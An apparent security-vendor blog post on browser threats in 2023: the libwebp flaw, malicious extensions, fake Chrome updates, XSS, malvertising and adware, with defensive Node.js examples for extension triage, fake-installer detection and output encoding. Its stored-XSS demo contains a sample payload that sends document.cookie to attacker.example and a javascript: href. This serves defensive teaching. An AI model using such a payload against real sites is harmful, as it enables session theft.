This week, Firefox users were urged to apply Mozilla’s latest updates against a critical flaw that could allow attackers to take control of affected systems. It follows hard on the heels of similar updates for Microsoft Edge, Google Chrome, and Apple’s Safari browser. All were hit by the same actively exploited bug: a heap buffer overflow in libwebp, the library that decodes WebP images (CVE-2023-4863), which every major browser bundles.
Although the WebP vulnerability affects other software as well (any application that ships its own copy of libwebp), browsers are by far the most ubiquitous applications on end user devices. A foothold in a compromised browser gives threat actors saved credentials, session cookies and browsing data, and a route further into the targeted environment.
In this post, we take a deep dive into browser security, exploring the differences between vulnerabilities and exploits, zero days and N-days, and highlighting the major browser vulnerabilities seen in 2023. We’ll discuss the various kinds of attacks that threat actors perpetrate via browser software, and round off with a guide on how to bolster browser security in the enterprise.
Vulnerabilities are essentially weaknesses or flaws in software, hardware, or systems that have the potential to be exploited. These can result from coding errors, misconfigurations, or design flaws, and they exist as unintentional openings for security threats.
Vulnerabilities can exist in various aspects of technology, including operating systems, applications, network protocols, and even human behavior. Not every vulnerability can be exploited, and not every exploit can lead to code execution or data loss.
How easily an attacker can turn a vulnerability into a working exploit, and what that exploit then lets them do, is an informal way of understanding severity ranking. CVSS formalizes the same idea with scored metrics such as attack complexity, privileges required, user interaction and impact; a fuller treatment of CVSS and vulnerability metrics can be found here.
Exploitation is the active act of taking advantage of vulnerabilities to carry out malicious actions. It involves utilizing the identified weakness to gain unauthorized access, compromise data, disrupt services, or perform other harmful activities. Exploitation can manifest in various forms, such as code execution, privilege escalation, data theft, or remote control over a compromised system.
Vulnerabilities and exploitation are two distinct but interconnected concepts in web browser security. While there may be many vulnerabilities that exist in web browser code today, not all of them are exploitable or actively exploited by threat actors.
When attackers discover a zero-day vulnerability, they have an opportunity to exploit it before the developer becomes aware and can release a security patch. The name ‘zero day’ stems from the uncomfortable fact that, since the developer is unaware of the bug, they have had no time (zero days) to fix it. Once a flaw is public and a patch is available, it is often referred to as an N-day vulnerability, where N is the number of days since disclosure. N-days remain valuable to attackers because many systems are not updated promptly, so a known, patched bug keeps working against everyone who has not yet installed the fix.
Both zero days and N-days give attackers a window in which to compromise user data, spread malware, or gain unauthorized access to systems. Because browsers run on practically every desktop and phone, a single exploitable browser bug affects a huge number of users across platforms at once. Browser zero days are therefore among the most critical and hardest problems in cybersecurity.
The WebP vulnerability isn’t the only recent CVE affecting internet browsers. Among the patches Google has made to Chrome in 2023 are:
Meanwhile, Apple has had its fair share of zero days to patch in WebKit (the browser engine that powers Safari and every browser on iOS) this year.
Mozilla has also patched multiple vulnerabilities throughout 2023, including CVE-2023-34414 and CVE-2023-34416, CVE-2023-4584/5, and the critical severity CVE-2023-5217 bug in Firefox 118, which was known to be actively exploited in the wild. That last bug is a heap buffer overflow in libvpx, the VP8 video codec library, not in WebP; it is a separate flaw from the libwebp one above, but the two have the same shape: a memory-safety bug in a media-decoding library that every major browser bundles, found under exploitation within weeks of each other.
Microsoft Edge has likewise patched against the libwebp vulnerability in recent days. In addition, last August’s Patch Tuesday saw the patching of two actively exploited zero days, CVE-2023-36884 and CVE-2023-38180, along with another 23 remote code execution vulnerabilities, six of which were rated as ‘critical’. Neither of those two zero days is an Edge bug; they are platform-level fixes, which still matter here because a browser exploit is routinely chained with an operating-system flaw to escape the renderer sandbox.
Like Vivaldi, Brave and Opera, Edge is built on Chromium, so a vulnerability fixed in Google Chrome usually applies to those browsers too, and stays exploitable in each of them until that vendor ships its own rebased release.
While browsers themselves represent a readily available attack surface, browser extensions, plug-ins and add-ons are also a vector for malware, particularly infostealers.
Following ChatGPT’s rise in popularity, for example, threat actors were observed jumping aboard the AI train, crafting a fake browser extension called “Quick access to ChatGPT” that harvested Facebook session data and was used to hijack thousands of Facebook business accounts.
Malicious extensions have also been found on reputable download sites. In June this year, Google removed 32 malicious extensions from the Chrome Web Store that, combined, had been downloaded over 75 million times. The extensions delivered the functionality users expected, but also carried obfuscated code with malicious intent. In one example, a PDF Toolbox extension injected JavaScript into every website its users visited. Although the threat actor’s objective wasn’t clear, that capability is enough to hijack search results and inject malicious links.
While Google took action to remove the identified extensions from its Web Store, that removal doesn’t automatically deactivate or uninstall them from the browser: a copy that is already installed keeps running until it is disabled on the endpoint or blocked by browser policy, so administrators have to hunt for it themselves.
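As an added example (not code from the original post or from SentinelOne), here is a Node.js triage script for the two checks this section points to: whether an installed extension’s ID appears in a list of extensions that have since been pulled from a store, and whether its manifest lets it run script in every page the user visits, the capability the PDF Toolbox case abused. The extension IDs, manifests and the removed-ID list are constructed for the demo; the sensitive-permission list is an analyst’s assumption, not an official Chrome classification.

```javascript
// Added example (not from the original post): triaging installed browser
// extensions from their manifests. Two checks matter here: whether the
// extension is one a store has since removed (removal does not uninstall
// it), and whether it can run script in every page the user visits.

// Permissions that let an extension read or alter page content, traffic,
// or other extensions. Assumption: an analyst's starting point, not an
// official Chrome classification.
const SENSITIVE_PERMISSIONS = new Set([
  'scripting', 'webRequest', 'webRequestBlocking', 'declarativeNetRequest',
  'cookies', 'history', 'tabs', 'management', 'nativeMessaging', 'debugger',
  'clipboardRead', 'proxy',
]);

// A match pattern that covers every site: "<all_urls>" or a scheme with a
// wildcard host (e.g. "*://*/*", "https://*/*").
function isBroadHostPattern(pattern) {
  return pattern === '<all_urls>' || /^(\*|https?):\/\/\*\//.test(pattern);
}

// Gather every host pattern the manifest asks for: MV3 host_permissions,
// URL-shaped entries in MV2-style permissions, and content_scripts matches.
function collectHostPatterns(manifest) {
  const patterns = [];
  for (const p of manifest.host_permissions || []) patterns.push(p);
  for (const p of manifest.permissions || []) {
    if (p === '<all_urls>' || p.includes('://')) patterns.push(p);
  }
  for (const cs of manifest.content_scripts || []) {
    for (const m of cs.matches || []) patterns.push(m);
  }
  return patterns;
}

// Return the reasons an installed extension deserves a closer look.
// `removedIds` is a Set of extension IDs known to have been pulled from
// the store (e.g. taken from a vendor advisory).
function assessExtension(ext, removedIds) {
  const reasons = [];
  const m = ext.manifest;
  if (removedIds.has(ext.id)) reasons.push('removed_from_store');

  const broad = collectHostPatterns(m).some(isBroadHostPattern);
  const hasContentScripts = (m.content_scripts || []).length > 0;
  const apiPerms = (m.permissions || []).filter((p) => SENSITIVE_PERMISSIONS.has(p));

  // Either a content script matching every site, or the scripting API plus
  // broad host access, lets the extension inject JavaScript into every page.
  if (broad && (hasContentScripts || apiPerms.includes('scripting'))) {
    reasons.push('injects_into_all_sites');
  } else if (broad) {
    reasons.push('broad_host_access');
  }
  for (const p of apiPerms) reasons.push(`sensitive_permission:${p}`);
  return reasons;
}

// Triage a whole installation: only extensions with findings, most reasons first.
function triageExtensions(installed, removedIds) {
  return installed
    .map((ext) => ({ id: ext.id, name: ext.manifest.name, reasons: assessExtension(ext, removedIds) }))
    .filter((r) => r.reasons.length > 0)
    .sort((a, b) => b.reasons.length - a.reasons.length);
}

// Constructed sample data (not real extension IDs or manifests).
const SAMPLE_INSTALLED = [
  { id: 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa', manifest: { manifest_version: 3, name: 'Site Notes',
      permissions: ['storage'], host_permissions: ['https://notes.example/*'] } },
  { id: 'bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb', manifest: { manifest_version: 3, name: 'PDF Helper',
      permissions: ['storage'],
      content_scripts: [{ matches: ['<all_urls>'], js: ['inject.js'] }] } },
  { id: 'cccccccccccccccccccccccccccccccc', manifest: { manifest_version: 2, name: 'Quick Access Assistant',
      permissions: ['cookies', 'webRequest', 'webRequestBlocking', 'https://*/*', 'http://*/*'] } },
];
const SAMPLE_REMOVED_IDS = new Set(['cccccccccccccccccccccccccccccccc']);

for (const finding of triageExtensions(SAMPLE_INSTALLED, SAMPLE_REMOVED_IDS)) {
  console.log(`${finding.id} (${finding.name}): ${finding.reasons.join(', ')}`);
}
```

On a real endpoint the manifests come from the profile’s extension directory; IDs the triage flags are candidates for the Chrome `ExtensionInstallBlocklist` enterprise policy, which both blocks new installs and disables copies already present.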
As browsers are in such wide and continual use, they also make good lures for social engineering campaigns. Threat actors use compromised or malicious websites to tell users their browser must be updated in order to view the page, then offer a malicious download posing as that update.
In a recent example of this kind of campaign, security researchers identified a new loader, IDAT Loader, being used to deliver infostealers such as Stealc, Lumma, and Amadey. The lure poses as a Chrome browser update: victims are redirected to a second URL from which a binary downloads automatically. When the fake update, “ChromeSetup.exe”, is run, it fetches the next-stage payload.
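An added example, not part of the original post or of the researchers’ work: a Node.js heuristic that checks download records, of the kind a browser’s download history or a proxy log holds, for files named like a browser installer that did not come from the vendor’s own hosts, with the referrer used as a second signal for the redirect chain these lures rely on. The vendor host allowlist is an assumption to be tuned per environment, and the sample records are constructed.

```javascript
// Added example (not from the original post): flagging fake browser-update
// downloads. A file named like a vendor's installer that did not come from
// that vendor's hosts is suspicious; a referrer on an unrelated site (the
// redirect chain in these lures) strengthens the call.

// Installer file-name patterns and the hosts a genuine copy may come from.
// Assumption: this allowlist is a starting point, not an authoritative list.
const INSTALLER_RULES = [
  { vendor: 'Chrome',  file: /^chrome(setup|_installer)?\.(exe|msi|dmg)$/i, hosts: ['google.com'] },
  { vendor: 'Firefox', file: /^firefox[\w .-]*\.(exe|msi|dmg)$/i,           hosts: ['mozilla.org', 'mozilla.net'] },
  { vendor: 'Edge',    file: /^microsoftedge[\w .-]*\.(exe|msi|dmg)$/i,     hosts: ['microsoft.com'] },
];

// True when `hostname` is `allowed` or a subdomain of it. A bare
// endsWith('google.com') would accept "evilgoogle.com"; requiring the
// leading dot does not, and a lookalike such as "dl.google.com.evil.example"
// fails because its suffix is wrong.
function hostMatches(hostname, allowed) {
  const h = hostname.toLowerCase();
  return h === allowed || h.endsWith('.' + allowed);
}

function hostnameOf(url) {
  try { return new URL(url).hostname.toLowerCase(); } catch (_) { return ''; }
}

// Assess one record {url, filename, referrer}. Returns null when the file is
// not named like a browser installer, otherwise a verdict with reasons.
function assessDownload(record) {
  const rule = INSTALLER_RULES.find((r) => r.file.test(record.filename));
  if (!rule) return null;

  const host = hostnameOf(record.url);
  const fromVendor = rule.hosts.some((h) => hostMatches(host, h));
  const refHost = hostnameOf(record.referrer || '');
  const refFromVendor = refHost !== '' && rule.hosts.some((h) => hostMatches(refHost, h));

  const reasons = [];
  if (!fromVendor) {
    reasons.push(`installer for ${rule.vendor} served from non-vendor host ${host || '(unparseable)'}`);
    if (refHost && !refFromVendor) reasons.push(`referred from unrelated site ${refHost}`);
  }
  return { filename: record.filename, vendor: rule.vendor, suspicious: reasons.length > 0, reasons };
}

function findSuspiciousDownloads(records) {
  return records.map(assessDownload).filter((v) => v && v.suspicious);
}

// Constructed sample records (not real log data): a genuine Chrome download,
// the fake-update pattern described above, a lookalike host, and a non-installer.
const SAMPLE_DOWNLOADS = [
  { url: 'https://dl.google.com/chrome/install/ChromeSetup.exe', filename: 'ChromeSetup.exe',
    referrer: 'https://www.google.com/chrome/' },
  { url: 'https://cdn-browser-update.example.net/dl/ChromeSetup.exe', filename: 'ChromeSetup.exe',
    referrer: 'https://compromised-blog.example/post/123' },
  { url: 'https://dl.google.com.update-now.example/ChromeSetup.exe', filename: 'ChromeSetup.exe',
    referrer: '' },
  { url: 'https://files.example.org/q3-report.pdf', filename: 'q3-report.pdf',
    referrer: 'https://intranet.example.org/' },
];

for (const v of findSuspiciousDownloads(SAMPLE_DOWNLOADS)) {
  console.log(`${v.filename}: ${v.reasons.join('; ')}`);
}
```

The rule is deliberately narrow: it says nothing about installers that are renamed or about updates delivered by the browser’s own updater, which never appear as user downloads. Its value is in catching the specific mismatch these lures produce, an installer-named executable arriving from a host the vendor does not control.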
Cross-Site Scripting (XSS) is a common web application vulnerability in which an attacker’s script is injected into a website or web application and then served to other users who visit it. The injected script runs in the victim’s browser with the origin of the vulnerable site, so it can read that site’s cookies, storage and page content and act as the victim within it.
CVE-2023-30777, disclosed in May 2023, is a reflected XSS flaw in the WordPress Advanced Custom Fields and Advanced Custom Fields PRO plugins (versions 6.1.5 and earlier). It could allow an attacker to inject scripts or other HTML payloads that execute in the browser of a logged-in user who is lured into opening a crafted link to a site running the vulnerable plugin.
In stored XSS, attackers submit the script, usually JavaScript, through input fields or other user-generated content areas of a web application, hidden inside innocent-looking data such as comments, search queries, or form submissions. When other users later load the affected page, their browsers render the injected script as part of the page content.
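To make the stored XSS mechanism above concrete, here is an added example (not code from the original post): a minimal comment renderer in Node.js with the vulnerable string-concatenation version beside a hardened one, plus a small audit that counts how many tags in the rendered output came from the data rather than the template. The sample comments are constructed, and “attacker.example” is a placeholder host.

```javascript
// Added example (not from the original post): how stored XSS arises when
// untrusted input is concatenated into markup, and how context-aware
// output encoding prevents it.

const ESCAPE_MAP = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };

// Encode for HTML text and double-quoted attribute contexts.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ESCAPE_MAP[ch]);
}

// href is a URL context, so character escaping alone is not enough: a
// "javascript:" or "data:" scheme is still live. Only absolute http(s)
// URLs are accepted; anything else becomes an inert "#".
function safeHref(value) {
  try {
    const u = new URL(String(value));
    if (u.protocol === 'http:' || u.protocol === 'https:') return escapeHtml(u.href);
  } catch (_) { /* not an absolute URL */ }
  return '#';
}

// VULNERABLE: untrusted fields are dropped straight into the template.
function renderCommentUnsafe(c) {
  return `<li><a href="${c.website}">${c.author}</a>: ${c.body}</li>`;
}

// HARDENED: each field is encoded for the context it lands in.
function renderCommentSafe(c) {
  return `<li><a href="${safeHref(c.website)}">${escapeHtml(c.author)}</a>: ${escapeHtml(c.body)}</li>`;
}

function renderAll(comments, render) {
  return `<ul>${comments.map(render).join('')}</ul>`;
}

// Audit a rendered list: the template emits exactly 2 + 4n tags for n
// comments (<ul>, </ul>, and <li><a>...</a></li> per comment). Any extra
// tag, or a javascript: href, must have come from the data.
function auditRender(comments, render) {
  const html = renderAll(comments, render);
  const tagCount = (html.match(/<\/?[a-z]/gi) || []).length;
  return {
    html,
    injectedTags: tagCount - (2 + 4 * comments.length),
    scriptHref: /href="\s*javascript:/i.test(html),
  };
}

// Constructed sample data standing in for stored, user-submitted comments.
const SAMPLE_COMMENTS = [
  { author: 'alice', website: 'https://example.com/', body: 'Nice post!' },
  { author: 'mallory', website: 'javascript:alert(document.cookie)',
    body: '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">' },
];

const unsafeAudit = auditRender(SAMPLE_COMMENTS, renderCommentUnsafe);
const safeAudit = auditRender(SAMPLE_COMMENTS, renderCommentSafe);
console.log(`unsafe: ${unsafeAudit.injectedTags} injected tag(s), javascript: href = ${unsafeAudit.scriptHref}`);
console.log(`safe:   ${safeAudit.injectedTags} injected tag(s), javascript: href = ${safeAudit.scriptHref}`);
console.log(safeAudit.html);
```

Two points the code makes that the prose does not: encoding has to match the output context (the same `escapeHtml` is right for text and quoted attributes but useless against a `javascript:` URL), and the fix belongs at the point of rendering, not at input time, because the same stored comment may later be emitted into several different contexts.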
As browsers’ primary purpose is to visit websites and render their content, they are inevitably exposed to malicious code hosted on those sites. One of the more common forms is the malvert, an online advertisement that spreads malware.
Bad actors purchase ad space just like regular businesses, often using automated systems to place their orders. They then create adverts with embedded malicious code and deliver them through legitimate advertising networks.
Even popular and trusted websites have unintentionally served malicious ads. Malverts deliver malware either through links in the advertisement that lead to a malicious download, or, where the browser has an unpatched vulnerability, through drive-by downloads that need no user interaction at all.
Adware, or “advertisement software”, displays intrusive advertisements on a device without the user’s consent or even their knowledge. It is often bundled with the installation of browser extensions or plug-ins. Once established, adware tracks the user’s online behavior, collects data, and presents targeted ads promoting the advertiser’s interests; it may also redirect the browser to specific websites or gather personal information.
Adware degrades system performance by consuming system resources and bandwidth. Most alarmingly, it can serve as a conduit for other malicious software, including spyware and ransomware. Some adware families are written with care: they use malware-style obfuscation and anti-analysis tricks to avoid detection and removal by users or security software.
While browser vendors continue to ship patches and add protective features to their products, organizations can do much on their side to minimize the threat and protect their browsing sessions.
IT teams can enforce browser security settings centrally through managed policy rather than relying on individual users: blocking pop-ups, forcing automatic updates, and restricting extensions to an IT-approved allowlist. With those decisions made once, at the organization level, users at every skill level browse more safely without having to get them right themselves.
On the user level, ongoing cybersecurity training builds a better defense posture and protects the business’s digital assets. Users can learn to spot common threats like phishing, malicious downloads, and spoofing, and to flag issues immediately. Training also reiterates the importance of keeping browsers and related software up to date, and the risk of storing sensitive data in browsers: saved passwords and session cookies are exactly what infostealers harvest.
Robust detection and response capabilities are key to keeping web browser sessions safe. XDR provides a holistic approach to security by integrating data from various sources, including web browsers, so security teams can watch across all systems and raise the flag on potential threats and actively exploited browser vulnerabilities in real time.
XDR solutions also use advanced analytics and machine learning (ML) to detect unusual or suspicious browser behavior, such as a browser process spawning a shell or writing an executable to disk, before it develops into a full compromise. By correlating user activity, network traffic, and endpoint data, XDR systems can identify signs of compromise or malicious activity that may otherwise go unnoticed.
In the context of browser-based attacks, XDR allows security teams to respond quickly and effectively. When an attack is detected, it can isolate affected endpoints, block malicious domains, and apply remediation actions right away to reduce the impact on the organization’s network.
Given the ubiquity of web browsers across desktop and mobile devices, it is unsurprising that they remain an attractive vector for threat actors looking to steal digital identities and personal information, or to launch full cyberattacks. Compromising a web browser can be used to gain a foothold on an operating system, hijack internet traffic or take over online accounts.
Improving web browser security requires a layered approach that combines good cybersecurity hygiene, ongoing user education, and the right detection and response technology.
Global organizations continue to trust SentinelOne for its AI-powered detection and response capabilities designed to drive enterprise-wide visibility against today’s cyber threats. Learn more about our XDR solution by contacting us or booking a demo.